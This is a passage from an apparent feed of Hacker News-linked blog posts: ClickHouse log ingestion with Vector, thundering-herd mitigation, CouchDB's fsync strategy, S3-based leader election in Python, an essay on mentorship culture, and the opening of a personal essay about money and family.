          `headers` Map(String, String),
          `tls` Tuple(
             `resumed` Bool,
             `version` Int32,
             `cipher_suite` Int32,
             `proto` String,
             `server_name` String,
          ),
        ),
        `bytes_read` UInt64,
        `duration` Float64,
        `size` UInt64,
        `status` UInt16,
        `resp_headers` Map(String, String),
        `request_url` String,
    )
    ENGINE = MergeTree
    ORDER BY tuple(request.host, ts);

    Next, I want to give the weblogger user the ability to query and write this table:

    GRANT 
      select, insert 
    ON weblogs.weblogs 
    TO weblogger;

    Combined with the IP-based auth scheme (above), that’s probably sufficient for my uses. Anyone who breaks into my web server can still query my web logs, but they’re already sitting on disk on the server, and there really isn’t anything sensitive in there anyway. They can’t delete data or access any other tables, at least not without exploiting some sort of security hole. I’m fine with that for home use.

    Adding data to Clickhouse manually

    So, I can batch-import data from Caddy’s logs into Clickhouse trivially from Clickhouse’s CLI via

    INSERT INTO 
      weblogs 
    FROM infile 'caddy-scottstuff.net.log' 
    FORMAT JSONEachRow;

    That’ll read the specified file and dump it into Clickhouse, decoding JSON as it goes.

    So, that’s easy enough, but how do you stream new data into Clickhouse from Caddy?

    Live import using Vector

    Enjoyably, Clickhouse has a blog post that walks through most of the options for live-importing data into Clickhouse. For log-like data, the recommended choices are the OTEL Collector, Vector, or Fluentbit.

    I’ve had a hard time wrapping my head around OTEL collector configs in the past, and I’ve never been all that happy with Fluent-family log collectors, while my very limited experience with Vector has been petty positive. So I figured I’d give it a try.

    Vector is kind of a monitoring middleware swiss army knife; it can read data from files or the network in a pile of different formats and protocols, then (optionally) perform filtering/data reduction/merging, and then send data out in another pile of formats. In this case, it’s perfectly capable of reading JSON line-by-line from a file (remembering progress across restarts), decoding it, and then piping it into Clickhouse.

    Installing Vector is very similar to installing Clickhouse – either a curl | sh or an Apt repository is available.

    The only thing that’s left is to tell Vector what you want it to do. Here’s my /etc/vector/vector.yaml config, more or less:

    sources:
      weblogs:
        type: "file"
        include:
          - /var/log/caddy/caddy*.log
    
    transforms:
      caddy:
        type: remap
        inputs: ["weblogs"]
        source: |
          . = parse_json!(.message)
          .server = get_hostname!()
          time = from_unix_timestamp!(to_int!(.ts * 1000 ?? 0), unit: "milliseconds")
          .timestamp = format_timestamp!(time, format: "%F %H:%M:%S%.f")
          proto = "http"
          if .request.tls.proto == "h2" || .request.tls.proto == "h3" {
            proto = "https"
          }
          .request_url, _ = proto + "://" + downcase(.request.host) + .request.uri
    
    sinks:
      clickhouse:
        type: "clickhouse"
        inputs: ["caddy"]
        endpoint: "http://10.0.0.28:8123"
        database: "weblogs"
        table: "weblogs"
        auth:
          user: weblogger
          strategy: basic
          password: ""

    The “fun” part of this is the transform, which decodes the JSON (it’s possible to have Clickhouse do that on its own, but then Vector wouldn’t be able to modify some of the data). Then I turn Caddy’s floating-point timestamp into a millisecond-accurate text stringBecause Clickhouse can convert ints to DateTime64 values, or it can convert ISO-ish strings with fractional seconds to DateTime64, but it can’t convert floating point numbers directly!?. Then I add the server name, so I can tell which server handled which log, and try to regenerate the actual URL using a bit of logic. It’s not quite right, but it’s close enough for my needs right now.

    Displaying and querying results

    Finally, I installed the Clickhouse plugin for Grafana (just one click in the web UI), gave it a URL, username, and password, and I was able to add queries on Grafana dashboards. Or I can use the clickhouse-client UI to issue SQL directly for ad-hoc queries.

    > select count(distinct request.uri) from weblogs.weblogs;
    
    SELECT countDistinct(request.uri)
    FROM weblogs.weblogs
    
    Query id: 13993860-959f-40ed-a7e8-3ed4ee6db4c9
    
       ┌─countDistinct(request.uri)─┐
    1. │                      19453 │
       └────────────────────────────┘
    
    1 row in set. Elapsed: 0.083 sec. Processed 3.90 million rows, 54.41 MB (47.19 million rows/s., 658.08 MB/s.)
    Peak memory usage: 28.82 MiB.

    So, I have roughly 19,000 distinct URIs in my 3.9M log entries, and it was able to answer that in 83 milliseconds, processing around 650 MB/sec. I expect that larger tables on this hardware would get somewhat higher read speeds. In any case, it’s hard to argue with 83 millisecond queries.

    ]]>
    https://scottstuff.net/posts/2025/02/27/caddy-logs-in-clickhouse-via-vector/ hacker-news-small-sites-43205932 Fri, 28 Feb 2025 14:25:34 GMT
    <![CDATA[How to Handle Sudden Bursts of Traffic or "Thundering Herd Problem"?]]> thread link) | @vinnyglennon
    February 28, 2025 | https://newsletter.scalablethread.com/p/how-to-handle-sudden-bursts-of-traffic | archive.org

    Imagine a scenario, where an event causes one or more of your services to experience an enormous surge in traffic, overwhelming their capacity. This can lead to one or more dependencies, such as a database, becoming overloaded and unresponsive, ultimately resulting in service failure (cascading failures). Such events could include multiple service instances failing and redirecting all traffic to a single instance, a viral image or video receiving huge viewership, or an online sale during a festival causing a database overload. This situation, where cascading failures lead to service unavailability due to a sudden spike in incoming traffic, is termed the Thundering Herd Problem.

    Fig. Thundering Herd Problem

    When a service fails to respond, the instinctive solution is to retry the request, assuming a transient failure. However, this approach can lead to the Thundering Herd scenario or exacerbate an existing one, as all clients retry simultaneously, overwhelming system resources. Instead, if clients retry at random intervals, the overloaded resource gets time to recover and respond. This randomness in retry timing, known as Jitter, helps distribute the load more evenly and prevents further strain on the system.

    Fig. Exponential Jitter and Retry

    Consider a scenario where a request to fetch an image from the cache results in a miss, leading to the request being fulfilled from the origin datastore. If a large number of simultaneous requests experience cache misses and are forwarded to the data store, this can create the Thundering Herd problem. Since all the requests are for the same image, only a single request should be forwarded to the datastore for fulfillment. The remaining requests can be queued and served from the cache once it is updated after the initial request returns from the data store.

    Fig. Queueing Requests

    Every large-scale application at some point requires service replication on the backend to handle increasing traffic. However, if this traffic is not evenly distributed across all service replicas, it can overwhelm specific instances. Using load balancers to distribute the load uniformly helps prevent the Thundering Herd problem.

    Fig. Load Balancing

    If a service exposes APIs, providing unlimited access to its clients can be disastrous if one or more clients abuse it. Scenarios like DDOS attacks or scheduled batch jobs can trigger the Thundering Herd problem. Implementing rate limiting to control how frequently a client can call the API can help manage high-throughput clients and prevent such issues.

    Fig. Rate Limiting

    A service dependency, such as a database, can fail due to the Thundering Herd problem. Similar to how an MCB (Miniature Circuit Breaker) protects a circuit by breaking it when there's a sudden spike in electric voltage, a service can implement a circuit breaker approach. This approach halts sending further outgoing requests to the dependency until it recovers and is ready to handle traffic again.

    Fig. Circuit Breaker

    While a circuit breaker allows a service to stop sending requests to a dependency, the dependency itself can drop incoming requests, a technique known as load shedding, to prevent the Thundering Herd problem. This is similar to rolling blackouts in the electrical world, where an electricity provider reduces the load to prevent a total system failure when demand exceeds capacity.

    Fig. Load Shedding
    ]]>
    https://newsletter.scalablethread.com/p/how-to-handle-sudden-bursts-of-traffic hacker-news-small-sites-43205514 Fri, 28 Feb 2025 13:47:02 GMT
    <![CDATA[CouchDB Prevents Data Corruption: Fsync]]> thread link) | @fanf2
    February 28, 2025 | https://neighbourhood.ie/blog/2025/02/26/how-couchdb-prevents-data-corruption-fsync | archive.org

    Programming can be exciting when the underlying fundamentals you’ve been operating under suddenly come into question. Especially when it comes to safely storing data. This is a story of how the CouchDB developers had a couple of hours of excitement making sure their fundamentals were solid (and your data was safe).

    Modern software projects are large enough that it is unlikely that a single person can fit all of its constituent parts in their working memory. As developers we have to be okay with selectively forgetting how the program we are working on at the moment works in some parts to make progress on others.

    Countless programming techniques as old as time itself (01.01.1970) help with this phenomenon and are commonly categorised as abstractions. As programmers we build ourselves abstractions in order to be able to safely forget how some parts of a program work.

    An abstraction is a piece of code, or module, or library, that has a public API that we can use and remember that tells us what we can do with the piece of code, and that we can remember to have certain guarantees. Say a module has a function makeBlue(thing): you don’t necessarily have to remember how the function makes thing blue, all you need to know is that it does.

    CouchDB is not a particularly large piece of software, but it is a relatively long running one, having been started in 2005. Certain parts of CouchDB are relatively old, meaning they solve a specific problem and we worked hard at the time to make sure we solve that problem good and proper and now all we, the CouchDB developers, remember is that we did solve it and that we can trust it. After that we don’t have much need to reevaluate the code in the module on an ongoing basis, so we are prone to forget specific details of how it works.

    One consequence of this is that if new information appears that might affect the design of the old and trusted module, you have to scramble to re-understand all the details to see how the module fares in light of the new information.

    This happened the other week when the CouchDB developers came across Justin Jaffray’s second part of his “NULL BITMAP Builds a Database” series: “#2: Enter the Memtable”. In it, Justin describes three scenarios for how data is written to disk under certain failure situations and evaluates what that means for writing software that does not want to lose any data (you know, a database).

    CouchDB has long prided itself on doing everything in its power to not lose any data by going above and beyond to make sure your data is safe, even in rare edge-cases. Some other databases do not go as far as CouchDB goes.

    For a moment, the CouchDB development team had collectively expunged the details of how CouchDB keeps data safe on disk that we could not immediately evaluate if CouchDB was susceptible to data loss in the specific scenario outlined by Justin.

    To understand the scenario, we have to explain how Unix systems — and especially Linux — reads and writes data to disk. Before we go there though, rest assured this had us sweating for a hot minute. The CouchDB dev team literally stopped any other work and got together to sort out whether there was something we had to do. Data safety truly is a top priority.

    The Art of Reading and Writing Data to Disk

    For Unix programs to operate on files, they have to acquire a file handle with the syscall open. Once acquired, the program can use the file handle to read from or to write to any data it likes by specifying an offset and a length, both in bytes, that describes where in the file and how much of the file should be read from or written to.

    The Unix kernel will respond to these syscalls by accessing the filesystem the file lives on. A filesystem’s job is to organise an operating system’s files onto a storage mechanism (NVMe, SSDs, hard drives, block storage etc.) and provide fast and safe access to those files.

    All file systems define a block size. That is a chunk of bytes that are always read or written in bulk. Common block sizes are 4096 or multiples thereof, like 8192 or 16384, sometimes even 128k. These block sizes, or pages exist so file systems can efficiently make use of all the available storage space.

    A consequence of this is that if you just want to read a single byte from storage, the kernel and file system will read at least a page of data and then only return the one byte. Even with the lowest page size of 4096, that’s 4095 bytes read from disk in vain.

    As a result, most programs try to avoid reading one byte at a time and instead aim for aligning their data in a way that maps directly to the page size or multiples thereof. For example, CouchDB uses a 4096 byte page, PostgreSQL uses 8192.

    The fundamental trade-off that is made with the various options for page sizes is latency vs. throughput at the cost of I/O amplification. In our example earlier, reading a single byte is fastest (i.e. happens with the lowest latency) from a 4096 byte page, at a ~4000x read amplification cost. On the opposite end, reading 1GB of data for a movie stream in 4096 byte chunks has no direct amplification (all bytes read are actually needed), but that will require 250,000 read requests to the file system. A larger page size like 1M will greatly improve streaming throughput.

    So there’s a value to getting the page size right for the kind of application. For databases this usually means making it as small as possible, as individual records should be returned quickly, without sacrificing too much streaming performance for larger pieces of data.

    The final piece of the puzzle is the page cache. This is the Unix kernel keeping file system pages in memory so it can serve them faster the next time they are requested.

    Say you read the page (0,4096) once, the kernel will instruct the filesystem to load the bytes from storage into a kernel memory buffer. When you then read that same page again, the kernel will respond with the in-memory bytes instead of talking to the file system and storage again. And since storage is ~800,000 times slower than main memory, your second read is going to be a lot faster.

    The same is happening for writing pages: if you write a new page (4097,8192) and then immediately read it again, that read will be very fast indeed, thanks to the page cache.

    So far so good. How could this go wrong?

    When writing a new page, Unix kernel can choose to write it into the page cache and then return the write call as a success. At that point, the data only lives in kernel memory and if the machine this runs on has a sudden power outage or kernel panic or other catastrophic failure, that data will be gone by the time the system has rebooted.

    That’s a problem for databases. When a database like CouchDB writes new data to storage, it must make sure the data actually fully made it to storage in a way that it can guarantee to read again later, even if the machine crashes. For that purpose, the Unix kernel provides another syscall: fsync, which tells the kernel to write the data actually onto storage and not just into the page cache.

    However, because the page cache provides a ludicrous speed improvement, databases aim to not fsync every single page. Instead they try to fsync as little as possible, while making sure data makes it safely to storage.

    What what happens if nobody ever calls fsync? Will the data be lost for good? Not quite: the Kernel will decide when to flush the block to disk if the CPU and and disk aren’t otherwise busy. If that never happens, eventually, the Kernel pauses processes that are writing to disk, so it can safely flush the cached blocks to disk.

    Heads up: we are going to gloss about a lot of details here to keep this under 50,000 words.

    CouchDB database files consist of one or more B+-trees and a footer. On startup a database file is opened and read backwards until it finds a valid footer. That footer contains, among some metadata, a pointer to each of the B+-trees, which are then used to fulfil whatever request for reading or writing data needs to be handled.

    When writing new data, CouchDB adds pages with B+-tree nodes to the end of the database file and then writes a new footer after that, which includes a pointer to the newly written B+-tree nodes.

    To recap, the steps for reading are:

    1. Open the database.
    2. Read backwards until a valid footer is found.
    3. Traverse the relevant B+-tree to read the data you are looking for.

    For writing:

    1. Open the database.
    2. Read backwards until a valid footer is found.
    3. Add new B+-tree nodes to the end of the file.
    4. Add a new footer.
      bt = B+-tree node, f = footer
    ┌──┬──┬──┬──┬──┬──┬──┬──┐
    │  │ ◄┼─ │  │ ◄┼─ │  │  │
    │ ◄┼─ │  │  │  │  │ ◄┼─ │               db file
    │  │  │  │ ◄┼──┼─ │  │  │
    └──┴──┴──┴──┴──┴──┴──┴──┘
     bt bt f  bt bt f  bt f
    
    A database file with three footers, i.e. a file that has received
    three writes. The footer includes pointers to B+-tree nodes.
    
     bt = B+-tree node, f = footer
    ┌──┬──┬──┬──┬──┬──┬──┬──┌──┌──┌──┐
    │  │  │  │  │  │  │  │  │  │ ◄┼─ │
    │  │  │  │  │  │  │  │  │ ◄┼──┼─ │      db file
    │  │  │  │  │  │  │  │  │  │  │  │
    └──┴──┴──┴──┴──┴──┴──┴──└──└──└──┘
     bt bt f  bt bt f  bt f  bt bt f
    
     The same database file, with two more B+-tree nodes and footer

    With all this information we can revisit The Sad Path in Justin’s post:

    I do a write, and it goes into the log, and then the database crashes before we fsync. We come back up, and the reader, having not gotten an acknowledgment that their write succeeded, must do a read to see if it did or not. They do a read, and then the write, having made it to the OS's in-memory buffers, is returned. Now the reader would be justified in believing that the write is durable: they saw it, after all. But now we hard crash, and the whole server goes down, losing the contents of the file buffers. Now the write is lost, even though we served it!

    Let’s translate this to our scenario:

    • “The log” is just “the database file” in CouchDB.
    • A “hard crash“ is a catastrophic failure as outlined above.
    • The “file buffers” are the page cache.

    In the sad path scenario, we go through the 4 steps of writing data to storage. Without any fsyncs in place, CouchDB would behave as outlined. But CouchDB does not, as it does use fsyncs strategically. But where exactly?

    CouchDB calls fsync after step 3 and again after step 4. This is to make sure that data referenced in the footer actually ends up in storage before the footer. That’s because storage is sometimes naughty and reorders writes for performance or just chaos reasons.

    If CouchDB is terminated before the first fsync, no data has been written. On restart, the previously existing footer will be found and any data it points to can be read. This will not include the write that was just interrupted, as none of that made it to memory or storage yet and the request has not returned with a success to the original caller.

    If CouchDB is terminated after first but before the second fsync, data will have made it both to the page cache and disk, but the footer might not have made it yet. If it did not, same as before: the previously existing footer will be found on restart, and the current writer will not have received a successful response. If it did make it, we know because of the first fsync that any data it points to will be safely on disk, so we can load it as a valid footer.

    But what if the footer makes it to the page cache and not storage and we restart CouchDB, read the footer and retrieve its data from the page cache? The writer could issue a read to see if its data made it and if it does, not retry the write: Boom, we are in the sad path and if the machine now crashes that footer is gone. For good. And with it, any pointer to the data that was just written.

    However, CouchDB is not susceptible to the sad path. Because it issues one more fsync: when opening the database. That fsync causes the footer page to be flushed to storage and only if that is successful, CouchDB allows access to the data in the database file (and page cache) because now it knows all data to be safely on disk.

    After working out these details, the CouchDB team could return to their regularly scheduled work items as CouchDB has proven, once again, that it keeps your data safe. No matter what.

    « Back to the blog post overview

    ]]>
    https://neighbourhood.ie/blog/2025/02/26/how-couchdb-prevents-data-corruption-fsync hacker-news-small-sites-43205512 Fri, 28 Feb 2025 13:46:49 GMT
    <![CDATA[How to Build a Mentorship Culture]]> thread link) | @mooreds
    February 28, 2025 | https://www.nathanbroslawsky.com/p/how-to-build-a-mentorship-culture-not-just-another-program/ | archive.org

    Every company should be looking for ways to grow and nurture their people. However, when companies introduce “mentorship,” it usually takes the form of a new internal matching service, pairing up employees who wouldn't naturally interact in their day-to-day work. However, a mentorship program is different from a mentorship culture, and the latter is where the real impact can happen. For that, we need to challenge the “add-on” implementation approach.

    Mentorship Culture

    A “mentorship culture” is one where everyone believes that it is their responsibility to share what they know and make those around them better. The corollary to this is the mindset that everyone can learn something from everyone around them. The abilities and willingness to both share and to learn are core to building this culture, and like any other aspect of the company culture, you have to be very intentional about how you hire for it.

    This culture must extend beyond values statements into our day-to-day work. While many organizations may struggle with ideas for how to operationalize mentorship, the opportunity often already exists within their standard processes. It's present anywhere feedback is given: product review meetings, design critiques, architectural reviews, code reviews, you name it. Every one of these interactions is an opportunity to have a meaningful exchange of knowledge.

    Building this into organizational habits takes deliberate effort and proper incentives. As Charlie Munger said, "Show me the incentive, I'll show you the outcome." There needs to exist an organizational expectation that this type of mentoring happens consistently. Simply put, this starts with leaders modeling this behavior and holding others accountable to it as well. Across the company, the more senior an individual becomes, regardless if they are an individual contributor or a manager, a larger part of the assessment of their performance should be that they are regularly taking others under their wing and helping them grow. Once this starts to happen, these bonds start to strengthen, more connections start to be made, and the culture starts to take root.

    Knowledge Flows Both Ways

    Simon Sinek says "I think mentor relationships aren't mentor-mentee, they should be mentor-mentor. And one should only agree to be someone's mentor if you want them to be your mentor too." This perspective fundamentally changes how we think about mentorship within organizations. Remember, in a true mentorship culture, everyone genuinely believes they have something to learn from everyone else.

    I experienced this principle in action a while back during a 1:1 with an engineer in my organization who asked me a specific question about how part of our business worked. When I asked who they had reached out to for information, they admitted being at a loss about who they could approach. I connected them with the head of that department (despite their initial protest of "no! They will be too busy to meet with me!"). The day after they met, that department head reached out to me, energized and excited about everything he had learned about our engineering process, how work gets done, and opportunities for improvement.

    This bi-directional learning opportunity creates tremendous value. More senior team members, from one level up all the way to the CEO, can learn from their junior employees about newest tools and technologies, see problems through fresh eyes, or gain insight into emerging trends. It sometimes is taken for granted, but mentoring, like delivering feedback, is a skill that develops over time. When mentoring is seen as one-way, the more senior someone gets, typically the less open they are to these learning opportunities. Years ago, I worked at a 500 person company, and I remember on the first day of work, my VP of Engineering set this tone perfectly: "Every day I come to work, and I get to see 500 people who are smarter than me." These mentorship opportunities truly are everywhere.

    Strategic Benefits

    While mentorship clearly benefits individual growth and development, its strategic value to the organization is equally impactful. When woven into company culture, mentorship creates multiple layers of organizational advantage that compound over time.

    Informal Networks and Knowledge Flow

    Every opportunity that is seized to have a mentoring conversation is also an opportunity to make an introduction to someone else who can help to build on their knowledge or help them further. Through this, the mentorship culture creates an informal network of information flow throughout the organization. When mentorship is baked into the culture, knowledge spreads more organically rather than staying siloed. Because information is actively and regularly shared through this informal network, there is redundancy to who knows what, which leads to problems being solved faster.

    Innovation and Problem-Solving

    This natural knowledge flow brings more perspectives into the problem-solving process. It's not just about different seniority levels — it's about cross-functional and cross-departmental learning that leads to more innovative solutions. When people from different parts of the organization regularly share knowledge and perspectives, they develop a broader understanding of the business and can spot opportunities that might otherwise go unnoticed. While this improved problem-solving capability delivers immediate value, the long-term strategic benefits are even more important.

    Leadership Development and Succession

    Perhaps most strategically valuable, a mentorship culture becomes a fundamental part of leadership redundancy and succession planning. Intentional mentorship creates multiple layers of capable leaders, even improving the discoverability of those who may not be in the obvious organizational hierarchy. And because knowledge is more distributed, the organization becomes less dependent on any single person. This creates a more resilient organization that is more adaptive to change, better at spotting threats and opportunities, quicker to respond to challenges, and more capable of sustaining performance through transitions.

    Strength Through Culture

    At its core, a mentorship culture creates something more sustainable and powerful than any standalone program could achieve: it builds trust and psychological safety throughout the organization by strengthening relationships by design. When knowledge sharing and the investment in each others' growth becomes part of how work gets done, it transforms how people interact. Team members become more willing to ask questions, share concerns, and offer new perspectives. This psychological safety, in turn, accelerates learning, growth, and innovation across the organization.

    The true power of a mentorship culture lies in how it compounds over time. Each meaningful exchange strengthens bonds. Each connection builds bridges across the organization. These bridges create new pathways for knowledge to flow, ideas to spread, and leaders to emerge. The result isn't just a more capable organization — it's a more adaptable and resilient one.

    This is why mentorship needs to be recognized as a fundamental building block of organizational health. At the rate in which technology is advancing and challenges are increasingly complex, our ability to learn from each other isn't just a "nice to have" — it's essential for business survival. The question isn't whether to invest in mentorship programs, but rather how to rethink mentorship from a separate initiative into a fundamental part of how we work. When we succeed at this, mentorship stops being something we do on top of our day jobs – it becomes how our organizations function and grow.

    ]]>
    https://www.nathanbroslawsky.com/p/how-to-build-a-mentorship-culture-not-just-another-program/ hacker-news-small-sites-43205502 Fri, 28 Feb 2025 13:46:08 GMT
    <![CDATA[Leader Election with S3 and If-Match]]> thread link) | @todsacerdoti
    February 28, 2025 | https://quanttype.net/posts/2025-02-25-leader-election-with-s3-and-if-match.html | archive.org

    Let’s implement leader election using Amazon S3’s If-Match condition by building a distributed lock with it.

    In August 2024, Gunnar Morling published a blog post that shows how to do it with the If-None-Match condition. Back then, If-Match had not yet been released. This post shows another way to solve the same problem.

    The post is intended to stand on its own so you don’t need to read Gunnar’s post first. But do read it as well to see how the solutions compare!

    What’s If-Match

    PutObject is the API call that you use to upload data to Amazon S3. By default, the PutObject calls are upserts: they will replace the object contents or create an object if one does not already exist.

    In 2024, Amazon introduced two conditions for the PutObject calls If-Match (announcement) and If-None-Match (announcement). They allow you to restrict the behavior in the following ways:

    • If you set If-None-Match: *, the call will only succeed if the object does not already exist.
    • If you set If-Match: <value>, the call will only succeed if the object exists and its content has the matching entity tag (ETag) value. Entity tag is essentially checksum for the object content.1

    DeleteObject also takes the If-Match condition, so you can delete an object only if it has matching ETag.

    If the call fails, you’ll get a 412 error response (or, in some cases, another 4xx error).

    Together with S3’s consistency guarantees these conditions allow you to do compare-and-swap (CAS) operations. They are a key building block for distributed systems.

    What’s leader election?

    Many distributed systems require designating one of the nodes as the leader. Typically the leader accepts the write requests from the clients and then sends them to the other nodes that process read requests.

    How do the nodes choose the leader? Martin Kleppmann in Designing Data-Intensive Applications writes:

    One way of electing a leader is to use a lock: every node that starts up tries to acquire the lock, and the one that succeeds becomes the leader.

    If we can build a distributed lock, we can perform leader election. Let’s see how to do that on S3.

    The locking protocol

    We will use a single object in the bucket for locking. Let’s call it lock. It will be a JSON blob that looks like this:

    {
      "expires_at": 1740151473.206179
    }
    

    Here expires_at is a timestamp in seconds since the UNIX epoch for when the lock expires.

    To acquire the lock, the nodes do the following.

    1. Read the contents of lock. If the object does not exist, there’s no lock and we can jump to step 3.
    2. If expires_at is in the past, the lock has expired and we can continue. Otherwise acquiring the lock has failed.
    3. Put a new version of lock with the desired expiration time and with one of the conditions:
      • If lock existed in step 1, use If-Match with its ETag value.
      • If lock did not exist in step 1, use If-None-Match.

    If the put in step 3 succeeds, the node has acquired the lock.

    S3 has strong read-after-write consistency, so if there is a lock, in step 1 every node is guaranteed to see up-to-date version of the lock data. In step 3, the use of the conditions guarantees that only one node will succeed at acquiring the lock.

    If the leader wants to release the lock, it can delete the object using If-Match with the ETag value received in step 3.

    Fencing tokens

    The elephant in the room is that this relies on the nodes having their clocks in sync, which is a famously difficult problem. Consider what happens if the leader’s clock is behind the others or the clock of one of the secondaries is ahead the others: the leader thinks it still holds the lock while the secondary thinks it has expired. If the secondary now grabs the lock, the former leader can end up issuing zombie requests.

    In his post How to Distributed Locking, Martin Kleppman explains that you can use fencing tokens to solve the issue. Fencing token is a number that increases every time a node acquires the lock. The token should then be included in the requests to the system that we hold the lock over, and it should track the highest token it has seen and reject the requests with lower tokens. This filters out the zombie requests.

    In our case, even expires_at could work as a fencing token if the lock duration is always the same. The protocol guarantees that it will always increase.

    However, we do not have to make the lock duration fixed. We can add another field token to the JSON object:

    {
      "expires_at": 1740151473.206179,
      "token": 1
    }
    

    token is a number, starting at zero, that should be incremented every time the lock is acquired. The node acquiring the lock reads it in step 1 and it can increase it in step 3.

    Releasing the lock by deleting object does not work anymore as that would reset the token. You can release the lock by setting expires_at to zero without incrementing token.

    {
        "expires_at": 0,
        "token": 1
    }
    

    Python implementation

    Here’s a basic implementation in Python using boto3. Adding support for the fencing tokens and releasing the lock is left as an exercise for the reader.

    import dataclasses
    import json
    from dataclasses import dataclass
    from datetime import UTC, datetime, timedelta
    from typing import TYPE_CHECKING, Self
    
    import boto3
    import botocore.exceptions
    
    if TYPE_CHECKING:
        from mypy_boto3_s3.client import S3Client
    
    s3_client: "S3Client" = boto3.client("s3")
    
    
    @dataclass(frozen=True)
    class LockData:
        expires_at: float
    
        def to_json(self) -> str:
            return json.dumps(dataclasses.asdict(self))
    
        @classmethod
        def from_json(cls, data: str) -> Self:
            return cls(**json.loads(data))
    
    
    def acquire_lock(
        s3_client: "S3Client",
        bucket: str,
        key: str = "lock",
        expires_in: timedelta = timedelta(seconds=60),
    ) -> bool:
        """Try to acquire a lock using S3 as the coördination mechanism.
    
        Args:
            s3_client: boto3 S3 client
            bucket: S3 bucket name
            key: S3 object key
            expires_in_seconds: Lock timeout
    
        Returns:
            bool: True if the lock was acquired, False otherwise
        """
    
        try:
            existing_lock = s3_client.get_object(
                Bucket=bucket,
                Key=key,
            )
        except botocore.exceptions.ClientError as e:
            if e.response["Error"]["Code"] == "NoSuchKey":
                existing_lock = None
            else:
                raise
    
        if existing_lock is not None:
            existing_data = LockData.from_json(existing_lock["Body"].read().decode("utf-8"))
    
            if datetime.now(UTC).timestamp() <= existing_data.expires_at:
                return False
    
            condition = {"IfMatch": existing_lock["ETag"]}
        else:
            condition = {"IfNoneMatch": "*"}
    
        lock_data = LockData(expires_at=(datetime.now(UTC) + expires_in).timestamp())
    
        try:
            s3_client.put_object(
                Bucket=bucket,
                Key=key,
                Body=lock_data.to_json(),
                **condition,  # type: ignore[arg-type]
            )
        except botocore.exceptions.ClientError as error:
            if error.response["Error"]["Code"] in (
                "ConditionalRequestConflict",
                "PreconditionFailed",
            ):
                # We could alternatively retry on ConditionalRequestConflict (409)
                return False
            raise
    
        return True
    

    Here’s another exercise for the reader: The lock object does not include information about who is holding the lock as it’s not necessary for the protocol. However, it would be handy in a real-world implementation in case you ever need to debug this.

    Does this make sense?

    What’s nice about this compared to Gunnar’s version is that there’s no need for a background process to delete the stale lock objects. Gunnar’s design creates a new object every time a lock is acquired but in this version, there’s only a single object that gets modified.

    However, with both designs you have to ask whether they make sense in the real world. As I’ve mentioned before, while S3 storage is fairly inexpensive, the requests are not cheap: in the standard tier and us-east-1 region, PUTs cost $0.005 per 1000 requests and GETs cost $0.0004 per 1000 requests. The latencies are in double-digit milliseconds. S3 Express One Zone makes the requests only 2x cheaper, so it does not materially change the situation.

    This means that if you’re looking to build a high-performance, low-cost distributed lock, S3 is not going to be your first choice. You would probably use it because you’re already using S3 for something else and you want to hold a lock over S3 resources. Unfortunately S3 does not support fencing tokens for PutObject calls, which limits the usefulness of this approach.

    This is a companion post for my lightning talk Why S3’s conditional writes made people excited at HYTRADBOI that shows how to use If-None-Match. It presents an idea similar to Gunnar’s and to what Delta Lake uses in practice.

    Talk errata: The error response for failing condition is 412, not 421 as claimed in the talk.

    Thanks to Joel Kaasinen, Juuso Takalainen, Iivari Äikäs, Waltteri, and Rishit for giving feedback on the talk and thanks to Joel Kaasinen for feedback on this post. Any mistakes are my own.

    Photos: The first one shows a rock and a tree at the frozen Lake Meiko in Kirkkonummi, Finland on a cloudy winter day. The second one is a cliff at Vepsu, a small island in the sea in front of Hamina, Finland.

    ]]>
    https://quanttype.net/posts/2025-02-25-leader-election-with-s3-and-if-match.html hacker-news-small-sites-43205434 Fri, 28 Feb 2025 13:39:16 GMT
    <![CDATA[Up and to the Right]]> thread link) | @will_critchlow
    February 28, 2025 | https://www.jordandipietro.com/article/up-and-to-the-right | archive.org

    My first job was in 6th grade - I was a busboy at Sam's Grill.

    My best friend Danny and I would bike there after school, clear plates, roll silverware, help the cooks deal dime bags behind the dumpster.

    Easy money.

    But man oh man, that first paycheck—the way those crumpled bills felt in my pocket. That dopamine hit. That excitement. Some kids get it and some kids just don't. 

    My Dad may have recognized the spark in me. Maybe he saw himself in it, who knows. 

    So he did what any good Dad would do—he took me to Beneficial Bank on Lancaster Ave, the same Philly institution where he'd been loyally depositing his own money for decades.

    Opening my first savings account didn't just give me a bank book; with it, I inherited his deeply rooted philosophy that equated saving with survival, his quiet obsession with financial security that bordered on paranoia, and the unspoken family doctrine that worth could be measured by how well you've prepared.

    That bank book became my scoreboard. 

    Every neighborhood had its hustles, and my friends and I chased them all.

    Snow shoveling, house painting, car washing, hoagie making.

    I’m not sure I worked hard because of some noble, to-be-developed-later work ethic, or if it was more of an obsessive-compulsive desire to watch my bank account climb.

    The subconscious need to see things move up-and-to-the-right.

    Looking back, I see now that while some of this was me, a lot was learned behavior. 

    My Dad quite literally shaped me—he was the family hero, the sole breadwinner, the heartbeat of our household.

    And my Pops was of course a product of his environment, and his father - growing up in poor Philadelphia, in a lower-class, work-before-play household with an immigrant-mentality. Pick yourself up by the bootstraps, etc.

    So he did—he went to college, med school, Vietnam, came home a few fractured fingers later, and opened up shop as a dentist in the blue-collar, Italian neighborhood where his parents still lived. 

    His office was pure 70's fever dream—turquoise swivel chairs, oversized lamps, dog-eared magazines stacked in every corner. My mom worked the front desk, my sister and I did homework in the back as Dad drilled and filled. 

    He was there at sunrise, left after dark—sixty, seventy hours a week of other people's molars.

    Then he'd come home, spread insurance forms across our kitchen table, and wage war against bureaucratic bullshit until midnight, muttering numbers under his breath like prayers. 

    If it sounded hard—it was. 

    But make no bones about it, he lifted us up into another stratosphere from where he came. We were solidly middle-class— by high-school, maybe even upper middle-class.

    But no doubt it all wore on him.

    He was almost always stressed, always grinding, always counting the wad of cash in his wallet. 

    Money in, money out. 

    And as a sensitive kid, I watched my Dad with cautious eyes—tracking his long hours, his countless steps. 

    I had this childhood fantasy of growing up to make 'millions', just so he could slow down, finally take a breath...so his shoulders might drop an inch from his ears. 

    And then years passed.

    I went to college, started my career, went to grad school, started again.

    The possibility of making good money - the fantasy of helping my Dad ease into retirement was starting to feel possible, almost within reach.

    Then life did what it does: a brain aneurysm took him at 65, just a few years shy of the retirement he'd been counting down to his whole life.

    No warning, no goodbye, no chance to rest.

    In my grief, I doubled down on the only strategy I knew: make money, save money, rinse, repeat. 

    As if somehow, by accumulating enough, I could retroactively win a game that had already ended.

    So I tried. 

    I worked hard. I was often in the right place at the right time. I stashed each bonus, each salary increase, each lucky break.

